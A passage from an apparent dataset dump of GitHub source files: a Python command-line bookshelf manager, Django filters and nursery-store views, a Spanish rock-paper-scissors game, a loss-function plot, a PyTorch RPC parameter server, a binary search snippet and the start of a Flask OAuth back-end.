by: {self.recommended_by}\\n\\\n Other: {self.other}\\n\\\n Status: {self.book_status}\\n\\\n Bookshelves: {', '.join(str(bookshelf) for bookshelf in self.bookshelves)}\\n\\\n Reviews: {len(self.reviews)}\"\n\n def sort_book(self, sort_val = 'Title'):\n '''method to return a value by which a book can be sorted. if no sort_val is provided, will return self.title.'''\n\n print(sort_val)\n if sort_val == 'Author':\n return self.author\n if sort_val == 'ISBN':\n return self.isbn\n if sort_val == 'url':\n return self.url\n if sort_val == 'Recommended by':\n return self.recommended_by\n if sort_val == 'Other':\n return self.other\n if sort_val == 'Status':\n return self.book_status\n if sort_val == '# of Reviews':\n return len(self.reviews)\n if sort_val == 'Latest Review Rating':\n if len(self.reviews) == 0:\n return 0\n else:\n return self.reviews[-1].rating\n else:\n return self.title\n\n\n def add_to_bookshelf(self, bookshelf=None):\n '''method to add a book to a bookshelf and prompt user if no bookshelf provided.\n Possible states:\n 1. bookshelf provided\n 2. No bookshelf provided - user prompted to pick a bookshelf or add a bookshelf'''\n if bookshelf is None:\n bookshelves = Bookshelf.bookshelves\n counter = 0\n words = f\"Choose a bookshelf to add {self} to:\\n\\\n Enter 'a' to add a new bookshelf\"\n\n for existing_bookshelf in bookshelves:\n words += f\"\\n\\tEnter '{counter}' to add to {existing_bookshelf}\"\n counter += 1\n words += f\"\\nBookshelf choice: \"\n while True:\n chosen_bookshelf = input(words).lower()\n if chosen_bookshelf == 'a' or int(chosen_bookshelf) in range(\n 0, counter):\n if chosen_bookshelf == 'a':\n bookshelf = Bookshelf()\n else:\n bookshelf = bookshelves[int(chosen_bookshelf)]\n break\n else:\n print(\"\\nPlease try again\")\n\n bookshelf.add_book(self)\n print(f\"{self} added to {bookshelf}\")\n\n def input_book_status(self):\n '''method to gather book_status from users, until the user inputs a valid book_status. \n Possible states:\n 1. no book_status provided\n 2. book_status provided is not in range\n 3. book_status is ok'''\n\n while True:\n print('Enter a number corresponding to the book_status of the book:')\n for item in Book.book_statuses:\n print(f'\\t{item} = \"{Book.add_book_statuses[item]}\"')\n book_status_option = input('\\tEntry: ')\n\n try:\n book_status_option = int(book_status_option)\n if book_status_option in Book.book_statuses.keys():\n break\n else:\n raise\n except:\n print(f\"Your entry '{book_status_option}' is not recognized\\n\")\n return Book.book_statuses[book_status_option]\n\n\n def add_review(self, review=None):\n print(f'Reviewing {self}:')\n if review is None:\n self.reviews.append(Review(self))\n else:\n self.reviews.append(review)\n self.book_status = Book.book_statuses[2]\n for bookshelf in self.bookshelves:\n bookshelf.reviews_count += 1\n\n print(f\"\\nReview added to {self.title}:\\n\\\n {self.reviews[-1]}\")\n\n def print_reviews(self, sort_val=None):\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n reviews_sorted = self.reviews\n\n if reviews_sorted:\n for review in reviews_sorted:\n print(review, '\\n')\n else:\n print(f\"{self.title}: No reviews yet!\")\n\n\nclass Review():\n '''An entity that represents a book review and associated data.\n\n Class Attributes:\n rating (1-5)\n review_count\n formats = 1: \"Physical Book\",\n 2: \"eBook\",\n 3: \"Audiobook\",\n 4: \"Other\"\n\n Instance Attributes:\n title (title of the book being reviewed)\n rating (1-5)\n start_date\n end_date\n big_idea\n other_notes_takeaways\n format_consumed\n\n Methods:\n get_title\n '''\n formats = {1: \"Physical Book\", 2: \"eBook\", 3: \"Audiobook\", 4: \"Other\"}\n rating_range = range(1,6)\n\n review_count = 0\n rating = range(1, 5)\n\n def __init__(self,\n book=None,\n rating=None,\n start_date=None,\n end_date=None,\n big_idea=None,\n other_notes_takeaways=None,\n format_consumed=4):\n if book is None:\n raise Exception(\"Need a book!\")\n elif rating is None:\n self.title = book.title\n self.rating = self.verify_rating(rating) #add/verify the rating\n self.start_date = input(\"Enter a start_date: \")\n self.end_date = input(\"Enter a end_date: \")\n self.big_idea = input(\"Enter the big_idea: \")\n self.other_notes_takeaways = input(\"Enter other_notes_takeaways: \")\n self.format_consumed = self.input_format() \n else:\n self.title = book.title\n self.rating = self.verify_rating(rating) #add/verify the rating\n self.start_date = start_date\n self.end_date = end_date\n self.big_idea = big_idea\n self.other_notes_takeaways = other_notes_takeaways\n self.format_consumed = Review.formats[format_consumed]\n Review.review_count += 1\n\n def input_format(self):\n '''method to gather format from users, until the user inputs a valid format. \n Possible states:\n 1. no format provided\n 2. format provided is not in range\n 3. format is ok'''\n\n while True:\n print('Enter a number corresponding to the format of the book:')\n for item in Review.formats:\n print(f'\\t{item} = \"{Review.formats[item]}\"')\n format_option = input('\\tEntry: ')\n\n try:\n format_option = int(format_option)\n if format_option in Review.formats.keys():\n break\n else:\n raise\n except:\n print(f\"Your entry '{format_option}' is not recognized\\n\")\n return Review.formats[format_option]\n\n def verify_rating(self, rating=None):\n '''method to verify if rating is in the rating_range. Possible states:\n 1. no rating provided\n 2. rating provided is not in range\n 3. rating is ok'''\n if rating is None:\n rating = input(f\"\\nEnter a rating ({Review.rating_range[0]}-{Review.rating_range[-1]} as an integer): \")\n while rating not in Review.rating_range or not isinstance(rating, int):\n try:\n rating = int(rating)\n if rating not in range(1, 6):\n raise\n except:\n rating = input(\n \"Invalid entry - please enter a rating (1-5 as an integer): \"\n )\n return rating\n\n def get_title(self):\n return self.title\n\n def __repr__(self):\n return f\"{self.title}\\n\\\n rating: {self.rating}\\n\\\n start_date: {self.start_date}\\n\\\n end_date: {self.end_date}\\n\\\n Big Idea: {self.big_idea}\\n\\\n Other notes & takeaways: {self.other_notes_takeaways}\\n\\\n format_consumed: {self.format_consumed}\"\n\n def __str__(self):\n return f\"{self.title}\\n\\\n rating: {self.rating}\\n\\\n start_date: {self.start_date}\\n\\\n end_date: {self.end_date}\\n\\\n Big Idea: {self.big_idea}\\n\\\n Other notes & takeaways: {self.other_notes_takeaways}\\n\\\n format_consumed: {self.format_consumed}\"\n\n\nclass BookshelfManager:\n \"\"\"This class creates new/loads instances of the bookshelf, book, and review objects\n and allows for user interaction\"\"\"\n\n menu = {\n 'L': '(L)ist my books',\n 'F': '(F)ilter my books',\n 'T': 'sor(T) my books',\n 'G': '(G)et the info about a book',\n 'A': '(A)dd a book',\n 'R': '(R)eview a book',\n 'C': 'save and (C)lose',\n 'Q': '(Q)uit without saving',\n 'S': '(S)ettings'\n }\n \n settings_dict = {\n 'R': '(R)eset my bookshelf (filters, sort, and counters will return to factory settings)',\n 'E': '(E)xit to Main Menu',\n 'T': 'Test'\n }\n\n filters_dict = {\n '0': \"Filter by 1st 2 books\",\n '1': \"Filter by 'Want to Read'\",\n '2': \"Filter by 'Reviewed'\",\n '3': \"Filter by 'Read, but not reviewed'\",\n '4': \"Filter by 'Don't want to read'\",\n 'R': '(R)eset my bookshelf (filters, sort, and counters will return to factory settings)',\n 'E': '(E)xit to Main Menu'\n }\n\n sorts_dict = {\n '0': 'Title',\n '1': 'Author',\n '2': 'ISBN',\n '3': 'url',\n '4': 'Recommended by',\n '5': 'Other',\n '6': 'Status',\n '7': '# of Reviews',\n '8': 'Latest Review Rating',\n 'E': '(E)xit to Main Menu'\n }\n \n def __init__(self):\n '''Generate new interaction instance and allow users to interact with their bookshelves\n until the user selects save and close = \"C\"'''\n self.intro() # introduce the program\n self.load_or_add_bookshelf() # load or add a bookshelf\n\n while True:\n\n #Prompt to save and close\n menu = BookshelfManager.menu\n menu_option = \"\"\n while True:\n print('\\nMain Menu\\nWhat would you like to do next?\\n\\nEnter: ')\n for item in menu:\n print(f'\\t({item}) to {menu[item]}')\n menu_option = input('\\nEntry: ').upper()\n if menu_option in menu:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{menu_option}' is not recognized\")\n if menu_option == \"L\":\n self.list_books()\n elif menu_option == \"F\":\n self.filter_books()\n elif menu_option == \"T\":\n self.sort_books()\n elif menu_option == \"G\":\n self.get_book_info()\n elif menu_option == \"A\":\n self.bookshelf.add_book()\n elif menu_option == \"R\":\n self.review_a_book()\n elif menu_option == \"S\":\n self.settings()\n elif menu_option == \"Q\":\n os.system('clear')\n print('Are you sure you want to quit? All your work will be lost!')\n print(\"Enter 'Quit' to confirm that you want to quit without saving\")\n quit_entry = input('\\nEntry: ')\n if quit_entry == 'Quit':\n print('Have a wonderful day!\\n')\n break\n else:\n print(f\"Your entry '{quit_entry}' did not match the characters 'Quit'\")\n elif menu_option == \"C\":\n self.bookshelf.save_bookshelf()\n print(f'{self.bookshelf} saved as {self.bookshelf}.bkshlf. Have a wonderful day!\\n')\n break\n\n\n\n def intro(self):\n print()\n print(\"Let's manage our bookshelf.\")\n print()\n print(\"You will be prompted to load an existing bookshelf or set up a new one.\")\n print(\"Then you will have the opportunity to add books and reviews.\")\n print(\"You can see the books on your bookshelf, and select them to see their details.\")\n print(\"First let's set up your bookshelf.\")\n time.sleep(0)\n print()\n\n def load_or_add_bookshelf(self):\n load_or_add = \"\"\n while True:\n print('Would you like to load an existing bookshelf, or add a new one?')\n load_or_add = input(\n 'Enter (L) to load an existing bookshelf or (A) to add a new bookshelf\\nEntry: '\n ).upper()\n if load_or_add == \"L\" or load_or_add == \"A\":\n break\n if load_or_add == \"A\":\n os.system('clear')\n bookshelf_name = input(\n \"What would you like to call your new bookshelf?\\n\")\n self.bookshelf = Bookshelf(bookshelf_name)\n print(f'\\n{self.bookshelf} created!\\n')\n else:\n os.system('clear')\n while True:\n try:\n bookshelf_file = input(\n \"What is the file name (with path) of the bookshelf you would like to load?\\n(Type 'C' to Cancel)\\n\"\n )\n if bookshelf_file.upper() == 'C':\n self.load_or_add_bookshelf()\n break\n else:\n self.bookshelf = Bookshelf.load_bookshelf(bookshelf_file)\n break\n except:\n print(f\"Could not find a file with the name '{bookshelf_file}'\")\n self.bookshelf.reset_bookshelf()\n print(f'\\n\"{self.bookshelf}\" bookshelf loaded:')\n self.bookshelf.print_bookshelf_summary()\n print()\n\n def list_books(self):\n os.system('clear')\n self.bookshelf.print_ascii_books()\n\n def settings(self):\n while True:\n\n #Prompt to choose settings\n settings_dict = BookshelfManager.settings_dict\n settings_option = \"\"\n while True:\n print('\\nSettings Menu\\nWhat would you like to do next?\\n\\nEnter: ')\n for item in settings_dict:\n print(f'\\t({item}) to {settings_dict[item]}')\n settings_option = input('\\nEntry: ').upper()\n if settings_option in settings_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{settings_option}' is not recognized\")\n if settings_option == \"R\":\n self.bookshelf.reset_bookshelf()\n print(f\"\\nFilters, sort, and counters for '{self.bookshelf}' have been reset to factory settings.\\n\")\n if settings_option == \"T\":\n print(f'self.bookshelf: {self.bookshelf}')\n print(f'self.bookshelf.books: {self.bookshelf.books}')\n print(f'self.bookshelf.books[0]: {self.bookshelf.books[0]}')\n print(f'self.bookshelf.books[0].bookshelves: {self.bookshelf.books[0].bookshelves}')\n elif settings_option == \"E\":\n print(f'Returning to Main Menu\\n')\n break\n \n \n def filter_books(self):\n while True:\n\n #Prompt to choose filter or sort\n filters_dict = BookshelfManager.filters_dict\n filters_option = \"\"\n while True:\n print('\\nFilter & Sort Menu\\nWhat would you like to do next?\\n\\nEnter: ')\n for item in filters_dict:\n print(f'\\t({item}) to {filters_dict[item]}')\n filters_option = input('\\nEntry: ').upper()\n if filters_option in filters_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{filters_option}' is not recognized\")\n if filters_option == \"R\":\n self.bookshelf.reset_bookshelf()\n print(f\"\\nFilters, sort, and counters for '{self.bookshelf}' have been reset to factory settings.\\n\")\n elif filters_option == \"0\":\n self.bookshelf.filter_books()\n print(f\"\\n'{self.bookshelf}' has been filtered by the first 2 books in the list.\\n\")\n elif filters_option in ['1', '2', '3', '4']:\n self.bookshelf.filter_books_status(Book.book_statuses[int(filters_option)])\n print(f\"\\n'{self.bookshelf}' has been filtered by books with a status of {filters_dict[filters_option]}.\\n\")\n elif filters_option == \"E\":\n print(f'Returning to Main Menu\\n')\n break\n\n def sort_books(self):\n while True:\n\n #Prompt to choose filter or sort\n sorts_dict = BookshelfManager.sorts_dict\n sort_option = \"\"\n while True:\n print('\\nSort Menu\\nHow would you like to Sort?\\n\\nEnter: ')\n for item in sorts_dict:\n print(f'\\t({item}) to sort by {sorts_dict[item]}')\n sort_option = input('\\nEntry: ').upper()\n if sort_option in sorts_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{sort_option}' is not recognized\")\n if sort_option == \"E\":\n print(f'Returning to Main Menu\\n')\n break\n while True:\n\n #Prompt to choose ascending or descending\n sort_order_dict = {'A':' (A)scending', 'D':' (D)scending'}\n sort_order = \"\"\n while True:\n print('\\nAscending or Descending?\\n\\nEnter: ')\n for item in sort_order_dict:\n print(f'\\t({item}) to sort by {sort_order_dict[item]}')\n sort_order = input('\\nEntry: ').upper()\n if sort_order in sort_order_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{sort_order}' is not recognized\")\n if sort_order == \"D\":\n reverse_option = True \n else:\n reverse_option = False\n self.bookshelf.sort_books(sort_val = sorts_dict[sort_option], reverse_arg = reverse_option)\n print(f\"\\n'{self.bookshelf}' has been sorted by book {sorts_dict[sort_option]} {sort_order_dict[sort_order]}.\\n\")\n break\n \n \n def choose_book(self):\n self.list_books()\n if self.bookshelf.books_count > 0:\n if self.bookshelf.books_count == 1:\n book_choice = 1\n print(f'{self.bookshelf.books[book_choice - 1]} is your only book:')\n else:\n book_choice = self.input_book_choice()\n return self.bookshelf.books[book_choice - 1]\n\n def get_book_info(self):\n book_choice = self.choose_book()\n print('\\n' + book_choice.get_book_info() +\n '\\n\\nReview(s): ')\n book_choice.print_reviews()\n \n def review_a_book(self):\n book_choice = self.choose_book()\n book_choice.add_review()\n\n def input_book_choice(self):\n '''method to gather a book choice from users, until the user inputs a valid book choice. \n Possible states:\n 1. no book choice provided\n 2. book choice provided is not in range\n 3. book choice is ok'''\n\n while True:\n print(\"Which book would you like? (Enter the number below the book on the bookshelf)\")\n book_choice = input('Entry: ')\n print()\n\n try:\n book_choice = int(book_choice)\n if (book_choice - 1) in range(0, self.bookshelf.books_count):\n break\n else:\n raise\n except:\n print(f\"Your entry '{book_choice}' is not recognized\\n\")\n return book_choice\n\n\n# Main Bookshelf Program - Conor Healy\n# The main program prompts the user to load a bookshelf or create a new one.\n\nos.system('clear')\nBookshelfManager()\n","repo_name":"revgizmo/goodreads_manager","sub_path":"continuing dev/archive/CopyOfbookshelf_all.py","file_name":"CopyOfbookshelf_all.py","file_ext":"py","file_size_in_byte":31185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"25471203612","text":"import django_filters\nfrom django import forms\nfrom interactions.models import Interaction, Keyword\nfrom main.constants import PROJECT_ORDERING, COMPANY_ORDERING\nfrom someapp.models import Company, Project\n\n\nclass CompanyFilter(django_filters.FilterSet):\n \"\"\"Ordering filter for list of companies\"\"\"\n o = django_filters.OrderingFilter(\n fields=(\n ('title', 'title'),\n ('created_date', 'created_date'),\n ),\n choices=COMPANY_ORDERING,\n empty_label=None\n )\n\n class Meta:\n model = Company\n fields = ['title', 'created_date']\n\n\nclass ProjectFilter(django_filters.FilterSet):\n \"\"\"Ordering filter for list of projects\"\"\"\n o = django_filters.OrderingFilter(\n fields=(\n ('title', 'title'),\n ('begin', 'begin'),\n ('end', 'end'),\n ),\n choices=PROJECT_ORDERING,\n empty_label=None\n )\n\n class Meta:\n model = Project\n fields = ['title', 'begin', 'end', ]\n\n\nclass Filter(django_filters.FilterSet):\n \"\"\"Filter project interactions by keywords\"\"\"\n keyword = django_filters.ModelMultipleChoiceFilter(\n field_name='keyword__title',\n to_field_name='title',\n widget=forms.CheckboxSelectMultiple,\n label='Keywords',\n queryset=Keyword.objects.all()\n )\n\n class Meta:\n model = Interaction\n fields = ['keyword', ]","repo_name":"Navi-n-Don/crm-project","sub_path":"main/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12963669452","text":"from random import choice\r\n\r\ndef opciones():\r\n while True:\r\n try:\r\n entrada = int(input(\"\\n¿Qué eliges?\\n1. Piedra.\\n2. Papel.\\n3. Tijera.\\nOpción: \"))\r\n\r\n if entrada == 1:\r\n opcion_jugador = \"Piedra\"\r\n print(\"\\nIngresaste Piedra\")\r\n return opcion_jugador\r\n break\r\n\r\n elif entrada == 2:\r\n opcion_jugador = \"Papel\"\r\n print(\"\\nIngresaste Papel\")\r\n return opcion_jugador\r\n break\r\n\r\n elif entrada == 3:\r\n opcion_jugador = \"Tijera\"\r\n print(\"\\nIngresaste Tijera\")\r\n return opcion_jugador\r\n break\r\n\r\n else:\r\n print(\"\\nHas seleccionado una opción no disponible.\")\r\n\r\n except:\r\n print(\"\\nSolo se permiten números.\")\r\n\r\ndef jugar(opcion_jugador):\r\n opcion_pc = choice([\"Piedra\", \"Papel\", \"Tijera\"])\r\n print(f\"Mi elección fue {opcion_pc}, entonces...\",end=\" \")\r\n\r\n if opcion_pc == opcion_jugador:\r\n return \"HEMOS QUEDADO EMPATE\"\r\n elif opcion_pc == \"Piedra\" and opcion_jugador == 'Tijera':\r\n return \"HE GANADO\"\r\n elif opcion_pc == \"Tijera\" and opcion_jugador == 'Piedra':\r\n return \"HAS GANADO\"\r\n elif opcion_pc == \"Papel\" and opcion_jugador == 'Piedra':\r\n return \"HE GANADO\"\r\n elif opcion_pc == \"Piedra\" and opcion_jugador == 'Papel':\r\n return \"HAS GANADO\"\r\n elif opcion_pc == \"Tijera\" and opcion_jugador == 'Papel':\r\n return \"HE GANADO\"\r\n elif opcion_pc == \"Papel\" and opcion_jugador == 'Tijera':\r\n return \"HAS GANADO\"\r\n\r\ndef main():\r\n i = 1\r\n while i == 1:\r\n opcion_jugador = opciones()\r\n resultado = jugar(opcion_jugador)\r\n if resultado == None:\r\n pass\r\n else:\r\n print(resultado)\r\n \r\n seguir = input(\"\\nIngresa 1 para seguir jugando conmigo, sino, ingresa otro número: \")\r\n try:\r\n int(seguir)\r\n except:\r\n print(\"\\nNo ingesaste un número, sigamos jugando.\\n\")\r\n\r\nmain()","repo_name":"xAGH/UPB","sub_path":"Ciclo 1/Fundamentos de programación 51633/Practicas/Olimpiadas/piedra_papel_tijera.py","file_name":"piedra_papel_tijera.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3458236906","text":"\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nplt.figure(figsize=(10,8))\nx = np.linspace(start=-1, stop=2, num=1001, dtype=np.float)\nlogi = np.log(1 + np.exp(-x)) / math.log(2)\nboost = np.exp(-x)\ny_01 = x < 0\ny_hinge = 1.0 - x\ny_hinge[y_hinge < 0] = 0\n\nplt.plot(x, y_01, 'g-', mec='k', label='(0/1损失)0/1 Loss', lw=2)\nplt.plot(x, y_hinge, 'b-', mec='k', label='(合页损失)Hinge Loss', lw=2)\nplt.plot(x, boost, 'm--', mec='k', label='(指数损失)Adaboost Loss', lw=2)\nplt.plot(x, logi, 'r-', mec='k', label='(逻辑斯谛损失)Logistic Loss', lw=2)\nplt.grid(True, ls='--')\nplt.legend(loc='upper right',fontsize=15)\nplt.xlabel('函数间隔:$yf(x)$',fontsize=20)\nplt.title('损失函数',fontsize=20)\nplt.show()\n","repo_name":"mrzhuzhe/pepper","sub_path":"statistical-learning/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"71256680634","text":"# https://stackoverflow.com/questions/34006994/how-to-upload-multiple-images-to-a-blog-post-in-django\n# https://docs.djangoproject.com/en/3.1/topics/forms/formsets/#using-a-formset-in-views-and-templates\n\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\n\nfrom django.db import transaction\nfrom django.forms import modelformset_factory\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .forms import CreateUserForm, AddPlantForm, AddPlantImageForm, LoginForm\nfrom .models import Account, Manager, Plant, PlantImage, UserCartPlant, Order\n\n\ndef verify_request(request):\n is_manager = False\n logged_in = False\n user = None\n if request.user is not None:\n user = request.user\n try:\n is_manager = Account.objects.get(email=request.user).is_manager\n logged_in = True\n except:\n logged_in = False\n pass\n\n return {\n \"logged_in\": logged_in,\n \"user\": user,\n \"is_manager\": is_manager,\n }\n\n\ndef home(request):\n plants = Plant.objects.all()\n context = verify_request(request)\n context[\"plants\"] = plants\n return render(request, 'index.html', context)\n\n\ndef signup(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm()\n context[\"form\"] = form\n return render(request, 'signup.html', context)\n\n\ndef signup_as_manager(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm()\n context[\"form\"] = form\n return render(request, 'signup-as-manager.html', context)\n\n\ndef create_account(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm(request.POST)\n form.save()\n return redirect('login')\n\n\n@transaction.atomic\ndef create_manager(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm(request.POST)\n Manager(account=Account.objects.get(email=form.save())).save()\n # print(form.save(), form.cleaned_data.get('email'))\n return redirect('login')\n\n\ndef account_login(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n\n if request.method == 'POST':\n form = LoginForm(request.POST)\n username = request.POST['username']\n password = request.POST['password']\n print(username, password)\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('home')\n form = LoginForm()\n context[\"form\"] = form\n return render(request, 'login.html', context)\n\n\n@transaction.atomic\ndef add_plant_to_db(request, ImageFormset):\n plant_form = AddPlantForm(request.POST)\n image_formset = ImageFormset(request.POST, request.FILES)\n if plant_form.is_valid() and image_formset.is_valid():\n plant = Plant(\n name=request.POST['name'],\n description=request.POST['description'],\n price=request.POST['price'],\n manager=Manager(account=Account.objects.get(email=request.user))\n )\n plant.save()\n for form in image_formset.cleaned_data:\n if form and form['image']:\n PlantImage(image=form['image'], plant=plant).save()\n else:\n raise ValueError(\"Validation Error!\")\n\n\n@login_required(login_url='/login/')\ndef add_plant(request):\n context = verify_request(request)\n form = AddPlantForm()\n ImageFormset = modelformset_factory(\n PlantImage, form=AddPlantImageForm, extra=4, exclude=('plant',))\n\n if request.method == \"POST\":\n add_plant_to_db(request, ImageFormset)\n return redirect('home')\n\n image_formset = ImageFormset(queryset=PlantImage.objects.none())\n context[\"form\"] = form\n context[\"image_formset\"] = image_formset\n\n return render(request, 'add-plant.html', {\"form\": form, \"image_formset\": image_formset})\n\n\ndef account_logout(request):\n logout(request)\n return redirect('home')\n\n\ndef add_to_cart(request):\n plant_id = request.GET.get('plantId')\n account = Account.objects.get(\n email=request.user)\n plant = Plant.objects.get(id=plant_id)\n try:\n user_cart_plant = UserCartPlant.objects.get(\n account=account, plant=plant)\n user_cart_plant.quantity = user_cart_plant.quantity+1\n user_cart_plant.save()\n except:\n UserCartPlant(account=account, plant=plant).save()\n return JsonResponse({'success': True})\n\n\n@login_required(login_url='/login/')\ndef cart(request):\n context = verify_request(request)\n user_cart_plant = UserCartPlant.objects.filter(\n account=Account.objects.get(email=request.user))\n context[\"user_cart\"] = user_cart_plant\n return render(request, 'cart.html', context)\n\n\n@login_required(login_url='/login/')\ndef place_order(request):\n context = verify_request(request)\n cart = UserCartPlant.objects.filter(\n account=Account.objects.get(email=request.user))\n for plant in cart:\n Order(plant=plant.plant, account=plant.account,\n quantity=plant.quantity, manager=plant.plant.manager).save()\n plant.delete()\n return redirect('cart')\n\n\n@login_required(login_url='/login/')\ndef received_orders(request):\n context = verify_request(request)\n orders = Order.objects.filter(\n manager=Manager.objects.get(\n account=Account.objects.get(email=request.user)))\n context[\"orders\"] = orders\n return render(request, 'received-orders.html', context)\n\n\n@login_required(login_url='/login/')\ndef dispatch_orders(request):\n context = verify_request(request)\n orders = Order.objects.filter(\n manager=Manager.objects.get(\n account=Account.objects.get(email=request.user)))\n for order in orders:\n order.delete()\n return redirect('received-orders')\n","repo_name":"akverma26/Online-Nursery-Store","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"24089463595","text":"import os, socket, time\nos.environ['MASTER_ADDR'] = 'localhost'\nos.environ['MASTER_PORT'] = '8818'\n\nimport torch\nimport torch.distributed.rpc as rpc\nfrom torch.multiprocessing import Lock\nfrom virtual_rodent.utils import save_checkpoint\nfrom .base import SampleQueue\n\nimport importlib.util\nspec = importlib.util.spec_from_file_location('_', os.environ['model_init_method_path'])\nscript = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(script)\nmodel_init_method = script.model_init_method\n\ntarget_model, behavior_model = None, None\nlock_target, lock_behavior = Lock(), Lock()\n\nsample_queue = None\n\ntraining_stats_keys = ('total_loss', 'mean_vtrace', 'mean_value', \n 'actor_loss', 'critic_loss', 'entropy', 'learning_rate')\ntraining_stats = {k: [] for k in training_stats_keys}\nreward_stats = dict()\nlock_training_stats, lock_reward_stats = Lock(), Lock()\n\ndef store_batch(worker_id, env_name, batch):\n sample_queue.put(worker_id - 1, batch)\n reward = batch['reward'].detach().cpu().sum().item()\n with lock_reward_stats:\n try:\n reward_stats[env_name].append(reward)\n except KeyError:\n reward_stats[env_name] = [reward]\n\ndef fetch_batch(batch_size):\n while len(sample_queue) < batch_size: # Get enough samples first\n time.sleep(0.1)\n return sample_queue.sample(batch_size)\n\ndef record_loss(loss_dict):\n with lock_training_stats:\n for k, v in loss_dict.items():\n training_stats[k] += list(v)\n\ndef get_target_model():\n global target_model\n with lock_target:\n if target_model is None: \n target_model = model_init_method()\n return target_model\n\ndef save(save_dir):\n save_checkpoint(target_model.state_dict(), None, os.path.join(save_dir, 'model.pt'))\n with open(os.path.join(save_dir, 'training_stats.pkl'), 'wb') as f:\n pickle.dump(training_stats, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(os.path.join(save_dir, 'rewards.pkl'), 'wb') as f:\n pickle.dump(reward_stats, f, protocol=pickle.HIGHEST_PROTOCOL)\n\ndef get_behavior_model():\n global behavior_model\n with lock_behavior:\n if behavior_model is None:\n behavior_model = model_init_method()\n return behavior_model\n\ndef param_rref(model):\n return [rpc.RRef(param) for param in model.parameters()]\n\ndef forward(model, *args, **kwargs):\n return model(*args, **kwargs)\n\ndef _call_method(method, rref, *args, **kwargs):\n return method(rref.local_value(), *args, **kwargs)\n\ndef remote_method(method, rref, *args, **kwargs):\n args = [method, rref] + list(args)\n return rpc.rpc_sync(rref.owner(), _call_method, args=args, kwargs=kwargs)\n\ndef run_parameter_server(rank, world_size, exit, exit_value, save_dir, n_workers, \n max_step, vision_dim, propri_dim, action_dim):\n os.environ['MASTER_ADDR'] = socket.gethostbyname(socket.gethostname())\n os.environ['MASTER_PORT'] = '8818'\n print('ps', os.environ['MASTER_ADDR'])\n rpc.init_rpc(name='ParameterServer', rank=rank, world_size=world_size)\n print('ps', os.environ['MASTER_ADDR'])\n global sample_queue\n sample_queue = SampleQueue(1000, n_workers, max_step,\n vision_dim, propri_dim, action_dim) \n print(\"RPC initialized! Running parameter server...\")\n while exit.value != exit_value:\n time.sleep(20)\n if target_model is not None and behavior_model is not None:\n behavior_model.load_state_dict(target_model.state_dict())\n save(save_dir)\n rpc.shutdown()\n print(\"RPC shutdown on parameter server.\")\n","repo_name":"gongziyida/virtual-rodent","sub_path":"virtual_rodent/IMPALA/distributed/ParameterServer.py","file_name":"ParameterServer.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14894540692","text":"# Binary search\r\n# Find arr number index \r\n\r\ndef first_arr_value(arr, target):\r\n left = 0\r\n right = len(arr) - 1\r\n\r\n while left <= right:\r\n mid = left + (right - left)//2\r\n if arr[mid] == target:\r\n return mid\r\n if arr[mid] < target:\r\n left = mid + 1\r\n else:\r\n right = mid - 1\r\n return None\r\n\r\nprint (first_arr_value([2,3,5,6,8,10,12], 8))\r\nprint (first_arr_value([2,3,5,6,8,10,12,500,658,999], 9))","repo_name":"ArnasKundrotas/algos-python","sub_path":"binary-search-find-index.py","file_name":"binary-search-find-index.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35523564217","text":"\"\"\"\nRecurse World back-end\n\"\"\"\n\nfrom functools import wraps\nimport logging\nimport os\nfrom flask import (\n Flask, jsonify, redirect, request, send_from_directory, session, url_for\n)\nfrom authlib.flask.client import OAuth\nfrom werkzeug.exceptions import HTTPException\nimport psycopg2\nimport sys\nfrom dotenv import load_dotenv\nimport geojson\n\n\nload_dotenv()\n\n\ndef getEnvVar(var_name, fallback=\"\"):\n value = os.getenv(var_name) or fallback\n if not value:\n logging.error(\n f'\"{var_name}\" value not found.'\n ' Ensure a .env file is present'\n ' with this environment variable set.'\n )\n sys.exit()\n\n logging.info(var_name + \": \" + value)\n return value\n\n\n# pylint: disable=invalid-name\napp = Flask(__name__)\napp.secret_key = getEnvVar('FLASK_SECRET_KEY', 'development')\n\nlogging.basicConfig(level=logging.INFO)\n\nrc = OAuth(app).register(\n 'Recurse Center',\n 